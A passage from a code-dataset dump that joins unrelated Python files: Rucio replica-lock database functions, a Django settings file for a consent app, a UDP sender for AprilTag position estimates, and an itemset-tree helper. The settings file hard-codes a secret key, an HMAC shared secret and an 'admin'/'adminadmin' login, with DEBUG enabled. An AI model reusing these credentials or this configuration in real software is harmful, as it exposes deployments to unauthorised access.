        if restrict_rses is not None:
            # Rebuild the query with the RSE restriction folded into the join
            # condition, so only locks on the requested RSEs are returned.
            rse_clause = []
            for rse_id in restrict_rses:
                rse_clause.append(models.ReplicaLock.rse_id == rse_id)
            if rse_clause:
                query = session.query(models.DataIdentifierAssociation.child_scope,
                                      models.DataIdentifierAssociation.child_name,
                                      models.ReplicaLock).\
                    with_hint(models.DataIdentifierAssociation, "INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)", 'oracle').\
                    filter(and_(models.DataIdentifierAssociation.child_scope == models.ReplicaLock.scope,
                                models.DataIdentifierAssociation.child_name == models.ReplicaLock.name,
                                or_(*rse_clause)))\
                    .filter(models.DataIdentifierAssociation.scope == scope,
                            models.DataIdentifierAssociation.name == name)
    else:
        # Other dialects: a single outer join returns every file, with a NULL
        # lock column for files that have no locks.
        query = session.query(models.DataIdentifierAssociation.child_scope,
                              models.DataIdentifierAssociation.child_name,
                              models.ReplicaLock).\
            with_hint(models.DataIdentifierAssociation, "INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)", 'oracle').\
            outerjoin(models.ReplicaLock,
                      and_(models.DataIdentifierAssociation.child_scope == models.ReplicaLock.scope,
                           models.DataIdentifierAssociation.child_name == models.ReplicaLock.name))\
            .filter(models.DataIdentifierAssociation.scope == scope, models.DataIdentifierAssociation.name == name)

        if restrict_rses is not None:
            # Fold the RSE restriction into the outer-join condition (keeping
            # the join outer so lock-less files are still returned).
            rse_clause = []
            for rse_id in restrict_rses:
                rse_clause.append(models.ReplicaLock.rse_id == rse_id)
            if rse_clause:
                query = session.query(models.DataIdentifierAssociation.child_scope,
                                      models.DataIdentifierAssociation.child_name,
                                      models.ReplicaLock).\
                    with_hint(models.DataIdentifierAssociation, "INDEX_RS_ASC(CONTENTS CONTENTS_PK) NO_INDEX_FFS(CONTENTS CONTENTS_PK)", 'oracle').\
                    outerjoin(models.ReplicaLock,
                              and_(models.DataIdentifierAssociation.child_scope == models.ReplicaLock.scope,
                                   models.DataIdentifierAssociation.child_name == models.ReplicaLock.name,
                                   or_(*rse_clause)))\
                    .filter(models.DataIdentifierAssociation.scope == scope,
                            models.DataIdentifierAssociation.name == name)

    if only_stuck:
        query = query.filter(models.ReplicaLock.state == LockState.STUCK)

    # Row-lock only the ReplicaLock state column for the selected rows.
    query = query.with_for_update(nowait=nowait, of=models.ReplicaLock.state)

    for child_scope, child_name, lock in query:
        if (child_scope, child_name) not in locks:
            if lock is None:
                # File without any lock (only possible on the outer-join path).
                locks[(child_scope, child_name)] = []
            else:
                locks[(child_scope, child_name)] = [lock]
        else:
            locks[(child_scope, child_name)].append(lock)

    return locks
@transactional_session
def successful_transfer(scope, name, rse_id, nowait, session=None):
    """
    Update the state of all replica locks because of an successful transfer

    :param scope:    Scope of the did
    :param name:     Name of the did
    :param rse_id:   RSE id
    :param nowait:   Nowait parameter for the for_update queries.
    :param session:  DB Session.
    """

    locks = session.query(models.ReplicaLock).with_for_update(nowait=nowait).filter_by(scope=scope, name=name, rse_id=rse_id)
    for lock in locks:
        if lock.state == LockState.OK:
            # Already accounted for; nothing to update.
            continue
        logging.debug('Marking lock %s:%s for rule %s on rse %s as OK' % (lock.scope, lock.name, str(lock.rule_id), str(lock.rse_id)))
        # Update the rule counters
        rule = session.query(models.ReplicationRule).with_for_update(nowait=nowait).filter_by(id=lock.rule_id).one()
        logging.debug('Updating rule counters for rule %s [%d/%d/%d]' % (str(rule.id), rule.locks_ok_cnt, rule.locks_replicating_cnt, rule.locks_stuck_cnt))
        # Move the lock's count from its previous state bucket to OK.
        if lock.state == LockState.REPLICATING:
            rule.locks_replicating_cnt -= 1
        elif lock.state == LockState.STUCK:
            rule.locks_stuck_cnt -= 1
        rule.locks_ok_cnt += 1
        lock.state = LockState.OK
        logging.debug('Finished updating rule counters for rule %s [%d/%d/%d]' % (str(rule.id), rule.locks_ok_cnt, rule.locks_replicating_cnt, rule.locks_stuck_cnt))

        # Insert UpdatedCollectionReplica
        # Queue a collection-replica recalculation for the affected dataset(s).
        if rule.did_type == DIDType.DATASET:
            models.UpdatedCollectionReplica(scope=rule.scope,
                                            name=rule.name,
                                            did_type=rule.did_type,
                                            rse_id=rse_id).save(flush=False, session=session)
        elif rule.did_type == DIDType.CONTAINER:
            # Resolve to all child datasets
            for dataset in rucio.core.did.list_child_datasets(scope=rule.scope, name=rule.name, session=session):
                models.UpdatedCollectionReplica(scope=dataset['scope'],
                                                name=dataset['name'],
                                                did_type=dataset['type'],
                                                rse_id=rse_id).save(flush=False, session=session)

        # Update the rule state
        if rule.state == RuleState.SUSPENDED:
            # Suspended rules keep their state until manual intervention.
            pass
        elif rule.locks_stuck_cnt > 0:
            # Other locks of the rule are still stuck; stay in current state.
            pass
        elif rule.locks_replicating_cnt == 0 and rule.state == RuleState.REPLICATING:
            # Last replicating lock finished: the rule is now fully satisfied.
            rule.state = RuleState.OK
            # Try to update the DatasetLocks
            if rule.grouping != RuleGrouping.NONE:
                ds_locks = session.query(models.DatasetLock).with_for_update(nowait=nowait).filter_by(rule_id=rule.id)
                for ds_lock in ds_locks:
                    ds_lock.state = LockState.OK
            session.flush()
            rucio.core.rule.generate_rule_notifications(rule=rule, replicating_locks_before=rule.locks_replicating_cnt + 1, session=session)
            if rule.notification == RuleNotification.YES:
                rucio.core.rule.generate_email_for_rule_ok_notification(rule=rule, session=session)
            # Try to release potential parent rules
            rucio.core.rule.release_parent_rule(child_rule_id=rule.id, session=session)
        elif rule.locks_replicating_cnt > 0 and rule.state == RuleState.REPLICATING and rule.notification == RuleNotification.PROGRESS:
            # Rule still replicating, but PROGRESS notifications are requested.
            rucio.core.rule.generate_rule_notifications(rule=rule, replicating_locks_before=rule.locks_replicating_cnt + 1, session=session)

        # Insert rule history
        rucio.core.rule.insert_rule_history(rule=rule, recent=True, longterm=False, session=session)

        session.flush()
@transactional_session
def failed_transfer(scope, name, rse_id, error_message=None, broken_rule_id=None, broken_message=None, nowait=True, session=None):
    """
    Update the state of all replica locks because of a failed transfer.

    If a transfer is permanently broken for a rule, the broken_rule_id should be
    filled which puts this rule into the SUSPENDED state.

    :param scope:          Scope of the did.
    :param name:           Name of the did.
    :param rse_id:         RSE id.
    :param error_message:  The error why this transfer failed.
    :param broken_rule_id: Id of the rule which will be suspended.
    :param broken_message: Error message for the suspended rule.
                           NOTE(review): assumed non-None whenever broken_rule_id
                           matches a lock's rule (len() is called on it) — confirm callers.
    :param nowait:         Nowait parameter for the for_update queries.
    :param session:        The database session in use.
    """
    # Row-lock (SELECT ... FOR UPDATE) all replica locks of this did on this RSE
    # so the per-rule counter updates below cannot race with concurrent workers.
    locks = session.query(models.ReplicaLock).with_for_update(nowait=nowait).filter_by(scope=scope, name=name, rse_id=rse_id)
    for lock in locks:
        if lock.state == LockState.STUCK:
            # Already accounted as stuck; skip so counters stay consistent.
            continue
        logging.debug('Marking lock %s:%s for rule %s on rse %s as STUCK' % (lock.scope, lock.name, str(lock.rule_id), str(lock.rse_id)))
        # Update the rule counters: move this lock from its previous bucket
        # (REPLICATING or OK) into the STUCK bucket.
        rule = session.query(models.ReplicationRule).with_for_update(nowait=nowait).filter_by(id=lock.rule_id).one()
        logging.debug('Updating rule counters for rule %s [%d/%d/%d]' % (str(rule.id), rule.locks_ok_cnt, rule.locks_replicating_cnt, rule.locks_stuck_cnt))
        if lock.state == LockState.REPLICATING:
            rule.locks_replicating_cnt -= 1
        elif lock.state == LockState.OK:
            rule.locks_ok_cnt -= 1
        rule.locks_stuck_cnt += 1
        lock.state = LockState.STUCK
        logging.debug('Finished updating rule counters for rule %s [%d/%d/%d]' % (str(rule.id), rule.locks_ok_cnt, rule.locks_replicating_cnt, rule.locks_stuck_cnt))
        # Update the rule state
        if rule.state == RuleState.SUSPENDED:
            # Suspended rules stay suspended; only the counters were touched.
            pass
        elif lock.rule_id == broken_rule_id:
            # The transfer is permanently broken for this rule: suspend it and
            # record the reason, truncated to fit the error column.
            rule.state = RuleState.SUSPENDED
            rule.error = (broken_message[:245] + '...') if len(broken_message) > 245 else broken_message
            # Try to update the DatasetLocks
            if rule.grouping != RuleGrouping.NONE:
                ds_locks = session.query(models.DatasetLock).with_for_update(nowait=nowait).filter_by(rule_id=rule.id)
                for ds_lock in ds_locks:
                    ds_lock.state = LockState.STUCK
        elif rule.locks_stuck_cnt > 0:
            if rule.state != RuleState.STUCK:
                rule.state = RuleState.STUCK
                # Try to update the DatasetLocks
                if rule.grouping != RuleGrouping.NONE:
                    ds_locks = session.query(models.DatasetLock).with_for_update(nowait=nowait).filter_by(rule_id=rule.id)
                    for ds_lock in ds_locks:
                        ds_lock.state = LockState.STUCK
            # Record the latest failure reason (truncated).
            # NOTE(review): a previously truncated stored value never compares
            # equal to the full message, so this re-assigns on repeat failures.
            if rule.error != error_message:
                rule.error = (error_message[:245] + '...') if len(error_message) > 245 else error_message
        # Insert rule history
        rucio.core.rule.insert_rule_history(rule=rule, recent=True, longterm=False, session=session)
@transactional_session
def touch_dataset_locks(dataset_locks, session=None):
    """
    Refresh the accessed_at timestamp of the given dataset locks and recompute
    the eol_at of the rules holding them.

    :param dataset_locks: iterable of dicts describing dataset locks; each needs
                          'scope' and 'name', plus either 'rse_id' or 'rse'
                          (optionally 'accessed_at').
    :param session: The database session in use.
    :returns: True if successful, False if a database error occurred.
    """
    rse_id_cache = {}
    access_time = datetime.utcnow()
    for lock_info in dataset_locks:
        # Resolve the RSE name to an id once per distinct name; unknown RSEs
        # are skipped entirely.
        if 'rse_id' not in lock_info:
            rse_name = lock_info['rse']
            try:
                if rse_name not in rse_id_cache:
                    rse_id_cache[rse_name] = get_rse_id(rse=rse_name, session=session)
            except RSENotFound:
                continue
            lock_info['rse_id'] = rse_id_cache[rse_name]
        eol_at = define_eol(lock_info['scope'], lock_info['name'], rses=[{'id': lock_info['rse_id']}], session=session)
        try:
            # Bulk-update the lock's access timestamp, then propagate the
            # recomputed eol_at to every rule holding a lock on this dataset.
            session.query(models.DatasetLock).filter_by(scope=lock_info['scope'], name=lock_info['name'], rse_id=lock_info['rse_id']).\
                update({'accessed_at': lock_info.get('accessed_at') or access_time}, synchronize_session=False)
            rule_id_rows = session.query(models.DatasetLock.rule_id).filter_by(scope=lock_info['scope'], name=lock_info['name'], rse_id=lock_info['rse_id'])
            for row in rule_id_rows:
                session.query(models.ReplicationRule).filter_by(id=row[0]).update({'eol_at': eol_at}, synchronize_session=False)
        except DatabaseError:
            return False
    return True
| 46.88914 | 165 | 0.614234 |
1c6b071f4f198e20aa26962ed66a10164b33c860 | 4,220 | py | Python | simpleconsent/settings.py | rhoerbe/simpleconsent | 5c75bb3794d2722853aa8f5963a5c013e1149074 | [
"MIT"
] | 1 | 2019-08-19T17:56:57.000Z | 2019-08-19T17:56:57.000Z | simpleconsent/settings.py | rhoerbe/simpleconsent | 5c75bb3794d2722853aa8f5963a5c013e1149074 | [
"MIT"
] | null | null | null | simpleconsent/settings.py | rhoerbe/simpleconsent | 5c75bb3794d2722853aa8f5963a5c013e1149074 | [
"MIT"
] | 1 | 2019-08-19T17:57:14.000Z | 2019-08-19T17:57:14.000Z | # this file contains secret keys. Protect file or insert values from environment
# Django settings for the simpleconsent project.
# NOTE(review): this module historically hard-coded secrets; production
# deployments should supply them via environment variables instead.
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# SECURITY WARNING: keep the secret key used in production secret!
# Backward compatible: the historical hard-coded key is kept as the fallback
# when DJANGO_SECRET_KEY is not set in the environment.
SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', '66_!!m)!ks&v)2cjy)m6+uhtm%0jz7*1+tu@whlebrqsb@b##z')

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = ['0.0.0.0', '127.0.0.1', 'localhost', 'wpvconsent.vnet', 'consent.wko.at', 'consent.qss.wko.at']

# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'data', 'db.sqlite3'),
    }
}

# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'de-AT'
TIME_ZONE = 'Europe/Vienna'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Authentication for API user that writes consent records
BASICAUTH_USERS = {'admin': 'adminadmin'}  # TODO: change weak default password
# Fix: this line used to read `BASICAUTH_REALM: 'api_user'`, a bare variable
# annotation that never assigns the name (settings.BASICAUTH_REALM would raise
# AttributeError). It must be a real assignment.
BASICAUTH_REALM = 'api_user'

# shared secret: configure same ASCII-value in proxy and consent app
PROXY_HMAC_KEY = b'leMn00UscEDWEtt/vvHs0v/+Wqjxih/WxixZOMLt'

# redirect to URL after the user accepted or declined consent
PROXY_HANDLE_CONSENT_RESPONSE_URL = 'https://satosa.vnet/simpleconsent_response'

CONSENT_BOILERPLATE_TEXT = {
    'purpose': 'Der Zweck der Datenweitergabe ist die Identifikation am ausgewählten Service. '
               'Wird keine Einwilligung gegeben, kann das Service, an das die Anmeldedaten übermittelt werden, '
               'möglicherweise die Anmeldung ablehnen.',
    'revocation': 'Die Einwilligung kann jederzeit widerrufen werden. '
                  'Bitte kontaktieren Sie dazu das Support Team der WKO Inhouse unter QuS@inhouse.wko.at '
                  'und der Angabe Ihres Namens und Ihrer Benutzerkennung. '
                  'Wird die Einwilligung widerrufen, erfolgt beim nächsten Login die Abfrage der Einwilligung.',
    'title': 'Attributfreigabe für die Anmeldung an',
}

# ====== The configuration below should not be changed in regular deployments ======

# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'consent',
    #'mysql_test',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'simpleconsent.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'simpleconsent.wsgi.application'

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static_root')
| 33.76 | 112 | 0.7 |
a02bb2a26ba4f0182baa47c6ee53f5bd76088c06 | 1,663 | py | Python | socket_sender.py | mark-belbin/underwater-apriltags | f8f720f232621c274e26e2f22fedb38c0c1424ac | [
"MIT"
] | 1 | 2020-11-01T13:39:42.000Z | 2020-11-01T13:39:42.000Z | socket_sender.py | mark-belbin/underwater-apriltags | f8f720f232621c274e26e2f22fedb38c0c1424ac | [
"MIT"
] | null | null | null | socket_sender.py | mark-belbin/underwater-apriltags | f8f720f232621c274e26e2f22fedb38c0c1424ac | [
"MIT"
] | null | null | null | ## Socket to send estimated pos to srauv_main.py's internal socket
import socket
import time
import json

# True once the UDP socket below has been created successfully; checked by
# send_over_socket() before every transmission.
socket_connected = False
# (host, port) of srauv_main's internal UDP socket.
srauv_address = ("localhost", 7003)
# time.time() of the last transmission; used for rate limiting.
last_tx_time_s = 0
# Minimum interval between transmissions, in seconds (200 ms).
socket_send_interval_s = 0.200
# Monotonically increasing message counter; -1 means nothing sent yet.
msg_num = -1

# Template for the position message sent to srauv_main; position/heading/tag
# fields are overwritten by send_over_socket() before each transmission.
msg = {
    "source" : "tag_detect",
    "msg_num" : msg_num,
    "msg_type" : "position",
    "timestamp" : time.strftime("%Y-%m-%d %H:%M.%S"),
    "pos_x" : -0.1,
    "pos_y" : -0.2,
    "pos_z" : -0.3,
    "heading" : 0.4,
    "tag_id" : -1
}

# Create the UDP socket once at import; failures are logged and leave
# socket_connected False, which turns send_over_socket() into a no-op.
try:
    srauv_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # internet, udp
    socket_connected = True
    print(f"socket_sender forwarding to internal socket {srauv_address}")
except socket.error:
    print(f"socket_sender failed to create socket {srauv_address}")
def send_over_socket(x: float, y: float, z: float, h: float, t: int):
    """Send an estimated position over UDP to srauv_main and log its reply.

    Rate-limited: calls made within ``socket_send_interval_s`` seconds of the
    previous transmission, or when the socket was never created, are dropped
    silently.

    :param x: estimated x position
    :param y: estimated y position
    :param z: estimated z position
    :param h: estimated heading
    :param t: id of the detected AprilTag (-1 for none)
    """
    global msg_num, last_tx_time_s

    # Drop the update if the socket never connected or one was sent recently.
    if not socket_connected or time.time() - last_tx_time_s < socket_send_interval_s:
        return

    msg_num += 1
    last_tx_time_s = time.time()

    try:
        # Populate the shared message template for this transmission.
        msg["msg_num"] = msg_num  # fix: was never written, so it stayed at -1 forever
        msg["timestamp"] = time.strftime("%Y-%m-%d %H:%M.%S")  # fix: was set once at import and never refreshed
        msg["pos_x"] = x
        msg["pos_y"] = y
        msg["pos_z"] = z
        msg["heading"] = h
        msg["tag_id"] = t
        print(f"socket_sender tx msg:{msg}")
        srauv_socket.sendto(json.dumps(msg).encode("utf-8"), srauv_address)

        # Get response from srauv_main. Log it
        # NOTE(review): recvfrom() blocks indefinitely if srauv_main never
        # replies; consider srauv_socket.settimeout(...) — confirm protocol.
        resp, addr = srauv_socket.recvfrom(4096)
        print(f"socket_sender rx utf8 resp:{resp}")
    except socket.error as e:
        print(f"socket_sender failed sendOverSocket {srauv_address}, err:{e}")
    except Exception as ex:
        print(f"socket_sender ex:{ex}")

## End socket stuff
cbe6188f62a1338f017af676bc91a4fc6789a55b | 1,439 | py | Python | krmining/utils/create_tree.py | SynitCool/keyar-mining | c41c6696eec5efb10755b874169c87f43117eb38 | [
"MIT"
] | 2 | 2021-12-04T21:02:50.000Z | 2021-12-24T01:23:39.000Z | krmining/utils/create_tree.py | SynitCool/keyar-mining | c41c6696eec5efb10755b874169c87f43117eb38 | [
"MIT"
] | null | null | null | krmining/utils/create_tree.py | SynitCool/keyar-mining | c41c6696eec5efb10755b874169c87f43117eb38 | [
"MIT"
] | null | null | null | from ..utils import tree
import itertools
def compressing_itemset_tree(root, endswith):
    """
    Compress the itemsets stored in a tree into occurrence counts.

    Delegates entirely to ``root.find_set``.

    Parameters
    ----------
    root : tree.Node
        tree that has been filled with itemsets, e.g.::

            apple
              \\
              banana
                \\
                mango

    endswith : str
        compress only itemsets ending with this column name,
        for example ``"mango"``.

    Returns
    -------
    dict
        mapping of itemset to count, for example ``{"mango": 1}``.
        NOTE(review): the exact key format is defined by
        ``tree.Node.find_set`` — confirm against krmining.utils.tree.
    """
    return root.find_set(endswith)
def make_tree(selected_df):
    """
    Build an itemset tree from a one-hot encoded transaction dataframe.

    Parameters
    ----------
    selected_df : pandas.DataFrame
        dataframe that has been selected, one row per transaction with 0/1
        item indicators.
        for example :
            | apple | banana | mango |
            | 1     | 0      | 0     |
            | 1     | 1      | 1     |
            | 1     | 0      | 1     |

    Returns
    -------
    tree.Node
        root of the resulting tree.
        for example :
            apple
              \\
              banana
                \\
                mango
    """
    root = tree.Node(None)
    for row_label in selected_df.index:
        row = selected_df.loc[row_label]
        # Keep only the column names whose indicator is truthy for this row.
        present_items = list(itertools.compress(row.index, row))
        root.check_add_child(tree.make_tree(present_items))
    return root
| 19.712329 | 76 | 0.461432 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.